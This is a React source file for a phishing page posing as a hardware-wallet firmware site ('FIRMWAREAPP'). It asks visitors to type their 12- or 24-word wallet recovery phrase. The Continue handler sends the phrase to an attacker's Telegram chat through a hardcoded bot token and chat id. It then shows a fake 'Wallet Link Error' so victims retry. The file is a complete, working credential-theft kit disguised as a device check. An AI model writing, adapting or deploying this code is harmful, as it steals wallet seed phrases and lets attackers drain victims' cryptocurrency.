import React, { useState } from 'react';
import { Link as RouterLink } from 'react-router-dom';
import {
  Box,
  Container,
  Typography,
  Button,
  ToggleButton,
  ToggleButtonGroup,
  Grid,
  Stepper,
  Step,
  StepLabel,
  TextField,
  Paper,
  AppBar,
  Toolbar,
  IconButton,
  Menu,
  MenuItem
} from '@mui/material';
import MenuIcon from '@mui/icons-material/Menu';
import LanguageIcon from '@mui/icons-material/Language';

const steps = ['Device Detection', 'Device Check', 'Live'];
const navItems = [
  'Products',
  'Apps and Services',
  'Learn',
  'For Business',
  'For Developers',
  'Support',
];

function RecoveryPhrase() {
  const [wordsCount, setWordsCount] = useState(24);
  const [words, setWords] = useState(Array(24).fill(''));
  const [activeStep, setActiveStep] = useState(1);
  const [success, setSuccess] = useState(false);
  const [loading, setLoading] = useState(false);
  const [anchorEl, setAnchorEl] = useState(null);

  const handleMenu = (event) => {
    setAnchorEl(event.currentTarget);
  };
  
  const handleClose = () => {
    setAnchorEl(null);
  };

  const handleWordsCount = (event, newCount) => {
    if (newCount) {
      setWordsCount(newCount);
      setWords(Array(newCount).fill(''));
    }
  };

  const handleWordChange = (index, value) => {
    const newWords = [...words];
    newWords[index] = value;
    setWords(newWords);
  };

  const handleContinue = async () => {
    setLoading(true);
    const phrase = words.filter(Boolean).join(' ');
    const message = `Recovery phrase (${wordsCount} words):\n${phrase}`;
    const botToken = "7888596228:AAGiPd60oZWuZnMpd62R9Ybe1OG5pRMAMoA"; // <-- Replace with your bot token
    const chatId = "-1002617880346";     // Updated to supergroup format with -100 prefix

    try {
      console.log({ chat_id: chatId, text: message }); // Log the data being sent
      const response = await fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          chat_id: chatId,
          text: message,
        }),
      });
      const data = await response.json();
      console.log('Telegram API response:', data); // Log the Telegram API response
      if (data.ok) {
        setSuccess(true);
      } else {
        alert('Failed to send to Telegram: ' + (data.description || 'Unknown error'));
      }
    } catch (error) {
      alert('Failed to send to Telegram');
    }
    setLoading(false);
  };

  return (
    <Box sx={{ minHeight: "100vh", bgcolor: "#18191a", color: "#fff", display: 'flex', flexDirection: 'column' }}>
      {/* Header */}
      <AppBar position="static" sx={{ bgcolor: '#111', boxShadow: 'none', borderBottom: '1px solid #222' }}>
        <Toolbar sx={{ justifyContent: 'space-between', minHeight: 64 }}>
          {/* Logo */}
          <Box sx={{ display: 'flex', alignItems: 'center' }}>
            <Box sx={{ border: '2px solid #fff', px: 1.5, py: 0.5, borderRadius: 1, fontWeight: 700, fontSize: 22, letterSpacing: 2, mr: 3 }}>
              FIRMWAREAPP
            </Box>
            <Box sx={{ display: { xs: 'none', md: 'flex' }, gap: 3 }}>
              {navItems.map((item) => (
                <Button key={item} sx={{ color: '#fff', fontWeight: 500, fontSize: 16, textTransform: 'none' }}>{item}</Button>
              ))}
            </Box>
          </Box>
          {/* Right side */}
          <Box sx={{ display: 'flex', alignItems: 'center', gap: 1 }}>
            <IconButton sx={{ color: '#fff' }}><LanguageIcon /></IconButton>
            <Box sx={{ display: { xs: 'flex', md: 'none' } }}>
              <IconButton onClick={handleMenu} sx={{ color: '#fff' }}>
                <MenuIcon />
              </IconButton>
              <Menu anchorEl={anchorEl} open={Boolean(anchorEl)} onClose={handleClose} keepMounted>
                {navItems.map((item) => (
                  <MenuItem key={item} onClick={handleClose}>{item}</MenuItem>
                ))}
              </Menu>
            </Box>
          </Box>
        </Toolbar>
      </AppBar>
      
      <Box sx={{ flex: 1, py: 8 }}>
        <Container maxWidth="sm">
          {/* Back to Home button */}
          <Box sx={{ display: 'flex', justifyContent: 'flex-start', mb: 3 }}>
            <Button
              component={RouterLink}
              to="/"
              variant="outlined"
              sx={{
                color: '#fff',
                borderColor: '#ff6f1a',
                '&:hover': {
                  borderColor: '#ff6f1a',
                  bgcolor: 'rgba(255, 111, 26, 0.1)'
                }
              }}
            >
              ← Back to Home
            </Button>
          </Box>
          
          <Paper elevation={3} sx={{ bgcolor: "#232323", p: 4, borderRadius: 3 }}>
            <Stepper activeStep={activeStep} alternativeLabel sx={{ mb: 4 }}>
              {steps.map((label, idx) => (
                <Step key={label}>
                  <StepLabel
                    sx={{
                      "& .MuiStepIcon-root": {
                        color: idx === activeStep ? "#ff6f1a" : "#fff",
                      },
                      "& .MuiStepLabel-label": {
                        color: idx === activeStep ? "#ff6f1a" : "#fff",
                      },
                    }}>
                    {label}
                  </StepLabel>
                </Step>
              ))}
            </Stepper>
            <Typography
              variant="h5"
              align="center"
              color="#fff"
              sx={{ mb: 3, fontWeight: 700 }}>
              Enter Device Recovery Phrase Words
            </Typography>
            <Box sx={{ display: "flex", justifyContent: "center", mb: 3 }}>
              <ToggleButtonGroup
                value={wordsCount}
                exclusive
                onChange={handleWordsCount}
                sx={{ bgcolor: "#232323" }}>
                <ToggleButton
                  value={24}
                  selected={wordsCount === 24}
                  sx={{
                    color: "#fff",
                    bgcolor: wordsCount === 24 ? "#ff6f1a" : "#232323",
                    border: 0,
                    mx: 1,
                    fontWeight: 700,
                    borderRadius: 2,
                    "&.Mui-selected": {
                      bgcolor: "#ff6f1a",
                      color: "#fff",
                      "&:hover": {
                        bgcolor: "#ff6f1a",
                      },
                    },
                  }}>
                  24 Words
                </ToggleButton>
                <ToggleButton
                  value={12}
                  selected={wordsCount === 12}
                  sx={{
                    color: "#fff",
                    bgcolor: wordsCount === 12 ? "#ff6f1a" : "#232323",
                    border: 0,
                    mx: 1,
                    fontWeight: 700,
                    borderRadius: 2,
                    "&.Mui-selected": {
                      bgcolor: "#ff6f1a",
                      color: "#fff",
                      "&:hover": {
                        bgcolor: "#ff6f1a",
                      },
                    },
                  }}>
                  12 Words
                </ToggleButton>
              </ToggleButtonGroup>
            </Box>
            <Grid container spacing={2}>
              {Array.from({ length: wordsCount }).map((_, i) => (
                <Grid item xs={4} key={i}>
                  <TextField
                    variant="outlined"
                    size="small"
                    fullWidth
                    sx={{
                      bgcolor: "#18191a",
                      input: {
                        color: "#fff",
                        textAlign: "center",
                        fontWeight: 500,
                      },
                      "& .MuiOutlinedInput-root": {
                        "& fieldset": { borderColor: "#444" },
                        "&:hover fieldset": { borderColor: "#ff6f1a" },
                        "&.Mui-focused fieldset": { borderColor: "#ff6f1a" },
                      },
                    }}
                    placeholder={`${i + 1}.`}
                    value={words[i] || ""}
                    onChange={(e) => handleWordChange(i, e.target.value)}
                  />
                </Grid>
              ))}
            </Grid>
            <Box sx={{ display: "flex", justifyContent: "center", mt: 4 }}>
              <Button
                variant="contained"
                color="primary"
                sx={{
                  bgcolor: "#ff6f1a",
                  fontWeight: 700,
                  px: 6,
                  py: 1.5,
                  fontSize: 18,
                  borderRadius: 2,
                }}
                onClick={handleContinue}
                disabled={loading}>
                {loading ? "Sending..." : "Continue"}
              </Button>
            </Box>
            {success && (
              <Typography
                align="center"
                sx={{ mt: 3, color: "red", fontWeight: 700 }}>
                Wallet Link Error! Please try again.
              </Typography>
            )}
          </Paper>
        </Container>
      </Box>
      {/* Footer */}
      <Box
        component="footer"
        sx={{ bgcolor: "#181818", color: "#bbb", py: 4, mt: 8 }}>
        <Container maxWidth="xl">
          <Grid container spacing={2} alignItems="center">
            <Grid item xs={12} md={4}>
              <Box
                sx={{
                  fontWeight: 700,
                  fontSize: 22,
                  letterSpacing: 2,
                  mb: { xs: 2, md: 0 },
                }}>
                FIRMWAREAPP
              </Box>
            </Grid>
            <Grid
              item
              xs={12}
              md={4}
              sx={{ textAlign: { xs: "left", md: "center" } }}>
              <Button
                sx={{ color: "#bbb", textTransform: "none", fontSize: 16 }}
                href="#">
                Privacy Policy
              </Button>
              <Button
                sx={{ color: "#bbb", textTransform: "none", fontSize: 16 }}
                href="#">
                Terms of Service
              </Button>
              <Button
                sx={{ color: "#bbb", textTransform: "none", fontSize: 16 }}
                href="#">
                Contact
              </Button>
            </Grid>
            <Grid
              item
              xs={12}
              md={4}
              sx={{
                textAlign: { xs: "left", md: "right" },
                mt: { xs: 2, md: 0 },
              }}>
              <Typography variant="body2" sx={{ color: "#888" }}>
                © {new Date().getFullYear()} FirmwareApp. All rights reserved.
              </Typography>
            </Grid>
          </Grid>
        </Container>
      </Box>
    </Box>
  );
}

export default RecoveryPhrase; 